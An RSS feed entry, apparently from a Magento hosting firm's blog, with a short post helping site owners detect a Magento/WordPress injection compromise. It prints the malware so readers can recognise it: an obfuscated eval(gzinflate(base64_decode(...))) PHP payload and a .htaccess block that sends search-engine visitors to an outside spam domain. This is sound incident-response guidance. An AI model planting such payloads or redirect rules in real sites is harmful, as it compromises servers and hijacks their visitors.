<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>
<channel>
	<title>Magento design, development and suport :: sonassi &#187; dVFda8IwFH0X/</title>
	<atom:link href="http://www.sonassi.com/tag/dvfda8iwfh0x/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.sonassi.com</link>
	<description>Latest press releases, tutorials and thoughts on the world can be found here</description>
	<lastBuildDate>Wed, 18 Jan 2012 14:06:23 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.4</generator>
		<item>
		<title>Magento/WordPress injection vulnerability</title>
		<link>http://www.sonassi.com/knowledge-base/magentowordpress-injection-vulnerability/</link>
		<comments>http://www.sonassi.com/knowledge-base/magentowordpress-injection-vulnerability/#comments</comments>
		<pubDate>Wed, 13 Jan 2010 19:05:53 +0000</pubDate>
		<dc:creator>Benjamin</dc:creator>
				<category><![CDATA[Knowledge Base]]></category>
		<category><![CDATA[Magento]]></category>
		<category><![CDATA["/checkout/onepage/saveMethod/" error]]></category>
		<category><![CDATA[dVFda8IwFH0X/]]></category>
		<category><![CDATA[hacking magento]]></category>
		<category><![CDATA[magento checkout redirect]]></category>
		<category><![CDATA[magento hack]]></category>
		<category><![CDATA[magento hacked]]></category>
		<category><![CDATA[magento injection]]></category>
		<category><![CDATA[magento vulnerability]]></category>
		<category><![CDATA[wordpress hacked]]></category>
		<category><![CDATA[wordpress injection]]></category>
		<guid isPermaLink="false">http://www.sonassi.com/?p=1217</guid>
		<description><![CDATA[We had been recently contacted by an agency (non-Sonassi Hosting) keen to resolve a Magento redirect on checkout bug. We quickly realised after inspection that the site had been subject to an all-too-common POST injection vulnerability. Discussing ultimate prevention is &#8230; <a href="http://www.sonassi.com/knowledge-base/magentowordpress-injection-vulnerability/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>We had been recently contacted by an agency (non-<a href="http://sonassihosting.com" title="Magento hosting UK">Sonassi Hosting</a>) keen to resolve a <a href="http://www.sonassi.com/knowledge-base/random-redirect-to-homepage-with-magento/" title="Magento redirect on checkout">Magento redirect on checkout</a> bug. We quickly realised after inspection that the site had been subject to an all-too-common POST injection vulnerability. Discussing ultimate prevention is beyond the scope of this post, but you can check for tell tale signs.</p>
<p>If you&#8217;re checkout isn&#8217;t operating as it should and you have checked out our <a href="http://www.sonassi.com/knowledge-base/random-redirect-to-homepage-with-magento/" title="Magento checkout redirect">Magento checkout redirect</a> guide, then your issue could be this.</p>
<p>Inspect your <strong>index.php|index.*</strong> files and look for:</p>
<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">&lt;?php</span> <span style="color: #990000;">eval</span><span style="color: #009900;">&#40;</span><span style="color: #990000;">gzinflate</span><span style="color: #009900;">&#40;</span><span style="color: #990000;">base64_decode</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'dVFda8IwFH0X/A+XEpaGldj6AXNSpg9FXybD1b1MKV2b2GBNStpOxth/X+I+3MOEhOTec8/NuSdoXTM92zHZQAh1oxtVqiPTLkoeo9VTtHrGizh+SNYmSmbzaBnjLZl0O4K7prhStYt+G3iAd0rtSoYJKA3f+F/4LS2UuogeankRK8WraUu6nfduBwBpIxbjib0bJYiHU16rbK8qJl0cjEc0GPs0GND+YIS9G99DzCztBT6BVOYw5VXbGOncA2cexdArhdyLpickrYrqLleHVMjQAQqtLpnMVM7OhjhfZ7Kc3UfOlpgi56o1UlMr9RLpHxctEWy6F1B/ozdyoermFg6+ZlRIm7DbsUMDHAtRMhdQaQbnmqX5SXzg94eEWDtoaLCTH1Oelao2T3NyilEV/vyU9pxz2wmwrFBQty8GthiqroeW8vEJ'</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #000000; font-weight: bold;">?&gt;</span></pre></div></div>
<p>Inspect your <strong>.htaccess</strong> file and look for:</p>
<div class="wp_syntax"><div class="code"><pre class="shell" style="font-family:monospace;">AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*new.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://you-search.in/in.cgi?4&amp;parameter=ku [R,L]</pre></div></div>
<p>If you find either of these entries, be sure to remove them immediately. Our advice would be to perform an security audit to review all FTP/SSH/Admin passwords along with solving the source injection issue by upgrading to the latest version of Magento/Wordpress.</p>
<p>There is a nice article on <a href="http://www.nicollet.net/2009/02/hacking-magento/" title="hacking Magento">hacking Magento</a> at <em>nicollet.net</em>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sonassi.com/knowledge-base/magentowordpress-injection-vulnerability/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Page Caching using disk (enhanced)
Database Caching 31/37 queries in 0.025 seconds using disk
Object Caching 2630/2634 objects using disk

Served from: www.sonassi.com @ 2012-02-10 00:52:48 -->
